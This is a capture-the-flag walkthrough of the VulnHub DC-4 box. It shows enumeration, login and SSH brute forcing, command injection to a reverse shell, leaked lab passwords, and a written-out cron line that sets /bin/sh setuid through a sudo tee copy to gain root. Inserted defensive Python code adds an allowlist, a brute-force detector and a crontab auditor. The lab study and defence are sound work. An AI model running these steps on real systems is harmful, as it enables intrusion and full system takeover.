DC-4 Walk-Through

Uuuff. Today I got DC-4 done, along with some other stuff. This awesome box is a little more work: it starts with enumerating just 2 ports, SSH and HTTP, and then a simple web login page that has no protection at all, not even blocking the many login attempts thrown at it. Once logged in we can run the commands shown on the page; by intercepting the request with Burp and tampering with it we get code execution. From there we catch a shell and need to escalate privileges twice, and the final privilege escalation lets us create a cron job that runs every minute and hands us a root shell. Let’s get this started!!

Initiated my arp-scan to find the box

dmcxblue@kali:~/Documents/vulnhub/DC4$ sudo arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9.5 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.1	a4:08:f5:53:18:56	(Unknown)
192.168.1.175	00:c0:ca:96:e7:91	ALFA, INC.
192.168.1.226	08:00:27:7a:e5:4d	Cadmus Computer Systems
192.168.1.169	88:de:a9:3c:5b:0d	Roku, Inc.
192.168.1.245	9c:ae:d3:ed:d2:7e	Seiko Epson Corporation

5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.5: 256 hosts scanned in 2.060 seconds (124.27 hosts/sec). 5 responded

Started with a fast nmap scan, then moved to a more targeted one.

dmcxblue@kali:~/Documents/vulnhub/DC4$ sudo nmap --min-rate 5000 -p- -sT 192.168.1.226
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-01 21:46 PDT
Nmap scan report for dc-4 (192.168.1.226)
Host is up (0.00046s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:7A:E5:4D (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 14.86 seconds

Then used the more detailed and targeted scan on the open ports that were found previously

dmcxblue@kali:~/Documents/vulnhub/DC4$ sudo nmap -sC -sV -p22,80 192.168.1.226 -oA nmap/DC4
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-01 21:47 PDT
Nmap scan report for dc-4 (192.168.1.226)
Host is up (0.00040s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
|   256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_  256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open  http    nginx 1.15.10
|_http-server-header: nginx/1.15.10
|_http-title: System Tools
MAC Address: 08:00:27:7A:E5:4D (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.36 seconds

I decided here to move to port 80. SSH is usually less likely to be vulnerable, and enumerating it would give me little to no hints beyond what is running and whether I can enumerate usernames, so I moved on to port 80. Visiting the HTTP page in the browser, this is presented.

Ran Nikto in the background, but there was not much to go on here:

dmcxblue@kali:~/Documents/vulnhub/DC4$ nikto -h http://192.168.1.226/ -o nikto-DC4.txt
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.226
+ Target Hostname:    192.168.1.226
+ Target Port:        80
+ Start Time:         2019-09-01 21:51:48 (GMT-7)
---------------------------------------------------------------------------
+ Server: nginx/1.15.10
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Cookie PHPSESSID created without the httponly flag
+ 7915 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time:           2019-09-01 21:52:30 (GMT-7) (42 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Gobuster found a few directories, but we cannot proceed from here because we need to be logged in.

dmcxblue@kali:~/Documents/vulnhub/DC4$ gobuster dir -u http://192.168.1.226/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php -o gobuster-dc4.log
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.226/
[+] Threads:        50
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Timeout:        10s
===============================================================
2019/09/01 21:52:14 Starting gobuster
===============================================================
/login.php (Status: 302)
/index.php (Status: 200)
/images (Status: 301)
/css (Status: 301)
/logout.php (Status: 302)
/command.php (Status: 302)
===============================================================
2019/09/01 21:54:45 Finished
===============================================================

After many failed attempts at guessing and SQL injection, I used Burp to brute-force the login page since nothing else had been working. I captured the request and sent it to Intruder, then set the payloads in their correct position as shown in the following screenshot.

Then I went to the Payloads tab and added a simple list. To cut time (I already knew the password) I only added a few keywords from it so it would be found faster.

We can see that while Burp was attacking, only 1 word came back with a different length, and this confirms our login has been successful.

Once logged in.

After this we notice 3 command options on the page. Selecting the first one, I decided to intercept the request with Burp to see the raw request, so I could manage it better and check whether it can be tampered with.

We can see the raw request in Burp.

Sent it to Repeater to tamper with, and we notice that we get code execution.

With this we can try to catch a shell: we edit the second part, after the pipe, and URL-encode it to receive a shell.

And our shell popped on an ncat listener on port 1234.
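Why the tampering works, and what closes it, as an added example (this is not DC-4's command.php, whose source the post does not show): the browser only ever needs to send an option id, and the server should map that id to a fixed argument vector and execute it without a shell. The option names and commands below are constructed for the example. Anything that is not exactly one of the allowed keys, including an allowed value with text appended after a pipe or semicolon, never resolves to a command, and there is no shell left to interpret the extra text anyway.

```python
import subprocess
from typing import Dict, List, Optional, Tuple

# Fixed argument vectors the page may run. The browser submits only one of
# these keys, never command text. Keys and commands are constructed for this
# example; DC-4's real option values are not shown on the page.
ALLOWED_COMMANDS: Dict[str, List[str]] = {
    "list_files": ["ls", "-l"],
    "disk_usage": ["df", "-h"],
    "free_memory": ["free", "-m"],
}


def resolve_command(option: str) -> Optional[List[str]]:
    """Map a submitted option id to its fixed argv, or None if it is not
    exactly one of the allowed keys. The lookup is an exact dict match, so a
    value with extra text appended (a pipe, a semicolon, a second command)
    can never resolve to anything."""
    if not isinstance(option, str):
        return None
    return ALLOWED_COMMANDS.get(option)


def run_option(option: str, timeout: float = 5.0) -> Tuple[int, str]:
    """Execute the allowlisted command for `option` without a shell and
    return (exit status, stdout). Unknown options raise before anything is
    spawned, which is also the event worth logging on the server side."""
    argv = resolve_command(option)
    if argv is None:
        raise ValueError(f"rejected option value: {option!r}")
    completed = subprocess.run(
        argv,               # list form: no shell, so no pipe/separator parsing
        shell=False,
        capture_output=True,
        text=True,
        timeout=timeout,
        check=False,
    )
    return completed.returncode, completed.stdout


def classify_submissions(values: List[str]) -> Dict[str, bool]:
    """Which of the given submitted values would be accepted. Useful for a
    unit test of the allowlist or for replaying values seen in access logs."""
    return {v: resolve_command(v) is not None for v in values}


if __name__ == "__main__":
    # Constructed submissions: the three legitimate option ids plus two
    # tampered values of the kind the post describes (text appended after a
    # pipe, and the raw command string sent instead of the key).
    samples = ["list_files", "disk_usage", "free_memory", "list_files|id", "ls -l"]
    for value, accepted in classify_submissions(samples).items():
        print(f"{value!r:>20} -> {'accepted' if accepted else 'rejected'}")
    print(run_option("list_files")[1])
```

The server-side log line for a rejected option is the detection point: a legitimate client can only ever produce the three keys, so any other value is tampering by definition.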

Moving on from here I noticed 3 user folders in the home directory. Manually viewing them, ‘jim’ was interesting as it contained an old-passwords.bak file.

www-data@dc-4:/home$ ls -la
ls -la
total 20
drwxr-xr-x  5 root    root    4096 Apr  7 02:33 .
drwxr-xr-x 21 root    root    4096 Apr  5 20:24 ..
drwxr-xr-x  2 charles charles 4096 Apr  7 04:31 charles
drwxr-xr-x  3 jim     jim     4096 Apr  7 04:30 jim
drwxr-xr-x  2 sam     sam     4096 Apr  7 04:31 sam
www-data@dc-4:/home$ 

Jim

www-data@dc-4:/home/jim/backups$ ls -la
ls -la
total 12
drwxr-xr-x 2 jim jim 4096 Apr  7 02:58 .
drwxr-xr-x 3 jim jim 4096 Apr  7 04:30 ..
-rw-r--r-- 1 jim jim 2047 Apr  7 02:26 old-passwords.bak

Using this file as a password list, I brute-forced the SSH login with Hydra and it came back with a positive result.

dmcxblue@kali:~/Documents/vulnhub/DC4$ hydra 192.168.1.226 -l jim -P old-passwords.txt ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-09-02 22:51:58
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 252 login tries (l:1/p:252), ~16 tries per task
[DATA] attacking ssh://192.168.1.226:22/
[STATUS] 176.00 tries/min, 176 tries in 00:01h, 76 to do in 00:01h, 16 active
[22][ssh] host: 192.168.1.226   login: jim   password: jibril04
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-09-02 22:53:45
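The Burp attack on the web login earlier and the Hydra run above look the same from the defender's side: one source making many authentication attempts in a short window. As an added example (not from the post or the DC-4 box), here is a sliding-window detector in Python fed by two parsers, one for Debian-style sshd `auth.log` lines and one for nginx combined-format access-log entries hitting `/login.php`. The log lines are constructed; the source IPs, process ids and thresholds are assumptions. For the web login the status code is deliberately ignored, since a form that redirects on both outcomes (the post notes only the response length differed) gives no reliable success signal, while the request rate per source does.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Deque, Dict, Iterable, List, Tuple

# Constructed sample logs (not captured from DC-4). The sshd lines follow the
# Debian /var/log/auth.log format; the web lines follow the nginx "combined"
# access-log format with a login handler at /login.php, as on the box.
SSH_AUTH_LOG = """\
Sep  2 22:51:59 dc-4 sshd[1201]: Failed password for jim from 192.168.1.50 port 40112 ssh2
Sep  2 22:52:00 dc-4 sshd[1203]: Failed password for jim from 192.168.1.50 port 40114 ssh2
Sep  2 22:52:01 dc-4 sshd[1205]: Failed password for jim from 192.168.1.50 port 40116 ssh2
Sep  2 22:52:02 dc-4 sshd[1207]: Failed password for jim from 192.168.1.50 port 40118 ssh2
Sep  2 22:52:03 dc-4 sshd[1209]: Failed password for jim from 192.168.1.50 port 40120 ssh2
Sep  2 22:52:04 dc-4 sshd[1211]: Failed password for jim from 192.168.1.50 port 40122 ssh2
Sep  2 22:53:44 dc-4 sshd[1300]: Accepted password for jim from 192.168.1.50 port 40300 ssh2
Sep  2 23:10:12 dc-4 sshd[1402]: Failed password for charles from 192.168.1.77 port 51002 ssh2
"""

WEB_ACCESS_LOG = """\
192.168.1.50 - - [01/Sep/2019:21:55:01 -0700] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.1.50 - - [01/Sep/2019:21:55:02 -0700] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.1.50 - - [01/Sep/2019:21:55:03 -0700] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.1.50 - - [01/Sep/2019:21:55:04 -0700] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.1.77 - - [01/Sep/2019:21:55:05 -0700] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.1.77 - - [01/Sep/2019:21:55:06 -0700] "GET /index.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
"""

SSHD_FAILED = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port"
)
NGINX_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

Event = Tuple[datetime, str]  # (timestamp, source ip)


def parse_sshd_failures(text: str, year: int) -> List[Event]:
    """Failed sshd logins as (timestamp, source ip). auth.log omits the year,
    so the caller supplies it."""
    events = []
    for line in text.splitlines():
        m = SSHD_FAILED.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["ip"]))
    return events


def parse_login_posts(text: str, login_path: str = "/login.php") -> List[Event]:
    """POSTs to the login handler as (timestamp, source ip), regardless of
    status code: the attempt rate is the signal, not the outcome."""
    events = []
    for line in text.splitlines():
        m = NGINX_LINE.match(line)
        if m and m["method"] == "POST" and m["path"] == login_path:
            ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
            events.append((ts, m["ip"]))
    return events


def detect_bursts(events: Iterable[Event], threshold: int,
                  window: timedelta) -> List[Tuple[str, datetime, int]]:
    """Sliding-window counter per source. Emits one alert per source the first
    time `threshold` events fall within `window`: (source, time, count)."""
    recent: Dict[str, Deque[datetime]] = defaultdict(deque)
    alerts, alerted = [], set()
    for ts, src in sorted(events):
        q = recent[src]
        q.append(ts)
        while ts - q[0] > window:       # drop attempts older than the window
            q.popleft()
        if len(q) >= threshold and src not in alerted:
            alerted.add(src)
            alerts.append((src, ts, len(q)))
    return alerts


def ssh_alerts(threshold: int = 5, window_seconds: int = 60):
    return detect_bursts(parse_sshd_failures(SSH_AUTH_LOG, 2019),
                         threshold, timedelta(seconds=window_seconds))


def web_alerts(threshold: int = 3, window_seconds: int = 30):
    return detect_bursts(parse_login_posts(WEB_ACCESS_LOG),
                         threshold, timedelta(seconds=window_seconds))


if __name__ == "__main__":
    for src, when, count in ssh_alerts() + web_alerts():
        print(f"ALERT {src}: {count} attempts by {when.isoformat()}")
```

The same counter is what a lockout or rate limit would key on; the only difference between detection and prevention here is whether the alert also disables the account or source for a cooling-off period.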

Jim SSH

Jim’s home folder contains 3 files: 1 directory, 1 ASCII text file and 1 SUID binary. We already learned that the folder just holds the old-passwords file, so no need for that one; the mbox file was interesting as it contained an email sent to Jim.

jim@dc-4:~$ ls
backups  mbox  test.sh
jim@dc-4:~$ cat mbox 
From root@dc-4 Sat Apr 06 20:20:04 2019
Return-path: <root@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
Received: from root by dc-4 with local (Exim 4.89)
	(envelope-from <root@dc-4>)
	id 1hCiQe-0000gc-EC
	for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000
To: jim@dc-4
Subject: Test
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCiQe-0000gc-EC@dc-4>
From: root <root@dc-4>
Date: Sat, 06 Apr 2019 20:20:04 +1000
Status: RO

This is a test.

I was still looking for other things, but once I remembered the mail folder at ‘/var/mail’ I found another file for Jim.

jim@dc-4:/var/mail$ ls
jim
jim@dc-4:/var/mail$ cat jim 
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
	(envelope-from <charles@dc-4>)
	id 1hCjIX-0000kO-Qt
	for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is:  ^xHhA&hvim0y

See ya,
Charles

Looks like an email from Charles just sending Jim his own password.

Used the su command and elevated to Charles

To shorten the enumeration time I used the LinEnum.sh script for privesc enumeration, and a positive result shows up in our local scan.

Let’s check this one out. According to teehee’s help we can:

charles@dc-4:~$ /usr/bin/teehee --help
Usage: /usr/bin/teehee [OPTION]... [FILE]...
Copy standard input to each FILE, and also to standard output.

  -a, --append              append to the given FILEs, do not overwrite
  -i, --ignore-interrupts   ignore interrupt signals
  -p                        diagnose errors writing to non pipes
      --output-error[=MODE]   set behavior on write error.  See MODE below
      --help     display this help and exit
      --version  output version information and exit

MODE determines behavior with write errors on the outputs:
  'warn'         diagnose errors writing to any output
  'warn-nopipe'  diagnose errors writing to any output not a pipe
  'exit'         exit on error writing to any output
  'exit-nopipe'  exit on error writing to any output not a pipe
The default MODE for the -p option is 'warn-nopipe'.
The default operation when --output-error is not specified, is to
exit immediately on error writing to a pipe, and diagnose errors
writing to non pipe outputs.

GNU coreutils online help: <http://www.gnu.org/software/coreutils/>
Full documentation at: <http://www.gnu.org/software/coreutils/tee>
or available locally via: info '(coreutils) tee invocation'

So this should be quite easy: we can just add a cron job that runs every minute and changes the permissions of ‘/bin/sh’ to 4777, which sets the SUID bit. After that, simply executing the SUID shell gives us a root shell.

charles@dc-4:~$ echo "* * * * * root chmod 4777 /bin/sh" |sudo /usr/bin/teehee -a /etc/crontab
* * * * * root chmod 4777 /bin/sh
charles@dc-4:~$ ls -al /bin/sh
lrwxrwxrwx 1 root root 4 Jan 24  2017 /bin/sh -> dash
charles@dc-4:~$ ls -al /bin/dash
-rwsrwxrwx 1 root root 124492 Jan 24  2017 /bin/dash
charles@dc-4:~$ /bin/sh
# whoami
root
# id
uid=1001(charles) gid=1001(charles) euid=0(root) groups=1001(charles)
# cd /root
# ls
flag.txt
# cat flag.txt	



888       888          888 888      8888888b.                             888 888 888 888 
888   o   888          888 888      888  "Y88b                            888 888 888 888 
888  d8b  888          888 888      888    888                            888 888 888 888 
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888 
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888 
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P 
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "  
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888 


Congratulations!!!

Hope you enjoyed DC-4.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.
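The appended crontab line and the resulting `-rwsrwxrwx` shell are both durable, visible artifacts on the box. As an added example (not part of the post), here is a small Python audit that parses a system crontab, flags root jobs that chmod a setuid or setgid bit onto a file, and decodes `ls -l` permission strings to flag setuid binaries that are world-writable or are shells. The crontab content is constructed from Debian's stock entries plus the line added above. The root cause, though, is the sudo rule itself: any rule that lets a user run `tee` (or a renamed copy of it) as root is an arbitrary file write as root and should be treated as equivalent to granting full root.

```python
import re
from typing import List, Tuple

# Constructed /etc/crontab content modelled on the state the session above
# leaves behind: Debian's stock entries plus the appended line.
CRONTAB_SAMPLE = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
* * * * * root chmod 4777 /bin/sh
"""

# chmod followed by optional flags and a numeric (3-4 octal digits) or symbolic mode
CHMOD_MODE = re.compile(r"\bchmod\s+(?:-\S+\s+)*(?P<mode>[0-7]{3,4}|[ugoa]*[-+=][rwxXst]+)")
SHELL_PATHS = ("/bin/sh", "/bin/dash", "/bin/bash", "/usr/bin/sh", "/usr/bin/bash")

Finding = Tuple[int, str]  # (crontab line number, description)


def parse_system_crontab(text: str) -> List[Tuple[int, str, str]]:
    """Return (line number, user, command) for job lines in /etc/crontab,
    which unlike per-user crontabs carries a user field before the command.
    Blank lines, comments and VAR=value assignments are skipped."""
    jobs = []
    for n, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        if line.startswith("@"):                # @reboot / @daily style schedule
            parts = line.split(None, 2)
            if len(parts) == 3:
                jobs.append((n, parts[1], parts[2]))
            continue
        parts = line.split(None, 6)             # 5 schedule fields, user, command
        if len(parts) == 7:
            jobs.append((n, parts[5], parts[6]))
    return jobs


def mode_sets_setid(mode: str) -> bool:
    """True if a chmod mode argument turns on the setuid or setgid bit."""
    if mode.isdigit():
        return len(mode) == 4 and int(mode, 8) & 0o6000 != 0
    # symbolic form that adds (+) or sets (=) an 's' permission, e.g. u+s, g+s
    return re.fullmatch(r"[ugoa]*[+=][rwxXst]*s[rwxXst]*", mode) is not None


def audit_crontab(text: str) -> List[Finding]:
    """Flag jobs that change a file mode to setuid/setgid; the appended line
    in the session above is exactly this pattern, aimed at a shell."""
    findings = []
    for n, user, command in parse_system_crontab(text):
        m = CHMOD_MODE.search(command)
        if m and mode_sets_setid(m["mode"]):
            target = next((p for p in SHELL_PATHS if p in command), None)
            detail = f" on shell {target}" if target else ""
            findings.append((n, f"{user} job sets setuid/setgid via chmod "
                                f"{m['mode']}{detail}: {command}"))
    return findings


def parse_mode_string(perm: str) -> int:
    """Convert an ls -l permission string such as '-rwsrwxrwx' to its octal
    mode (0o4777), including the setuid/setgid/sticky letters."""
    if len(perm) != 10:
        raise ValueError(f"bad permission string: {perm!r}")
    mode = 0
    for i, ch in enumerate(perm[1:]):
        if ch in "rwx":
            mode |= 1 << (8 - i)
        elif ch in "sS" and i == 2:             # user exec position
            mode |= 0o4000 | (0o100 if ch == "s" else 0)
        elif ch in "sS" and i == 5:             # group exec position
            mode |= 0o2000 | (0o010 if ch == "s" else 0)
        elif ch in "tT" and i == 8:             # other exec position
            mode |= 0o1000 | (0o001 if ch == "t" else 0)
        elif ch != "-":
            raise ValueError(f"unexpected character {ch!r} in {perm!r}")
    return mode


def audit_ls_line(line: str) -> List[str]:
    """Check one `ls -l` line for what the session produces: a setuid/setgid
    binary that is world-writable, or a setuid shell."""
    parts = line.split()
    if len(parts) < 9:
        return []
    mode, owner, path = parse_mode_string(parts[0]), parts[2], parts[-1]
    issues = []
    if mode & 0o6000:
        if mode & 0o002:
            issues.append(f"{path}: setuid/setgid and world-writable (mode {mode:o})")
        if path in SHELL_PATHS or path.endswith(("/sh", "/dash", "/bash")):
            issues.append(f"{path}: shell with setuid/setgid bit, owned by {owner}")
    return issues


if __name__ == "__main__":
    for n, why in audit_crontab(CRONTAB_SAMPLE):
        print(f"crontab line {n}: {why}")
    for issue in audit_ls_line("-rwsrwxrwx 1 root root 124492 Jan 24  2017 /bin/dash"):
        print(issue)
```

Run against the real files this amounts to `cat /etc/crontab` piped into `audit_crontab` and `ls -l` over the usual shell paths piped into `audit_ls_line`; a file-integrity baseline of `/etc/crontab` and `/etc/cron.d` catches the append itself the moment it happens.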

Categories: DC Series, General

dmcxblue

Infosec Hobbyist, Wanna be Red-Teamer, Pentester Dreamer
OSCP | OSWP
GED- In Progress
